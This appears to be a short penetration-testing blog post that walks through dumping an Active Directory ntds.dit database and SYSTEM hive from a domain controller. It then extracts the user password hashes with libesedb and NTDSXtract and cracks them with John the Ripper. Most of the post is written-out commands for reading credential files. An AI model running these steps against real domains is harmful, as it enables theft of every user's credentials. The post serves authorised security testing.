govolution

NTDS Cracking with Kali

During a pentest it might be possible to gain access to the DC of a windows network. The ntds.dit file is interesting, because all kind of information of the AD is stored here, as for example the user hashes.
When looking for a howto crack NTDS databases I found:
https://gist.github.com/ddouhine/018ac4a8c95498101e7f
Not everything worked for me, so here are my steps:
Copy the files from the DC
I use Invoke-NinjaCopy from powersploit (https://github.com/PowerShellMafia/PowerSploit).
. .\Invoke-NinjaCopy
Invoke-NinjaCopy -path “c:\your\path\ntds\ntds.dit” -localdestination “c:\temp\ntds.dit”
Invoke-NinjaCopy -path “c:\windows\system32\config\SYSTEM” -localdestination “c:\temp\SYSTEM”
-> copy files to Kali Workstation
Installation on Kali
wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-
20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
tar -zxf libesedb-alpha-20120102.tar.gz
cd libesedb-20120102/
./configure && make && sudo make install
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
unzip ntdsxtract_v1_0.zip
Extract Hashes
/root/Downloads/ntds/libesedb-20120102/esedbtools/esedbexport ntds.dit
python /root/Downloads/ntds/NTDSXtract\ 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7
./hashdumpwork –passwordhashes SYSTEM –lmoutfile ./lm-out.txt –ntoutfile ./nt-out.txt –pwdformat ophc > dsusers.results
grep -A 2 “Password hashes:” dsusers.results |grep -v “Password hashes” |grep -v ‘Record ID’|grep -v “\-\-” |sort|uniq > allHashes
grep ‘\$NT\$’ allHashes | sed ‘s/.\(.*\)/\1/’ > NTHashes
grep -v ‘\$NT\$’ allHashes | sed ‘s/.\(.*\)/\1/’ > LMHashes
Cracking
# john –fork=8 NTHashes
… or whatever.
More about these topics:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?p=2398
https://www.attackdebris.com/?p=92
http://ntdsxtract.com/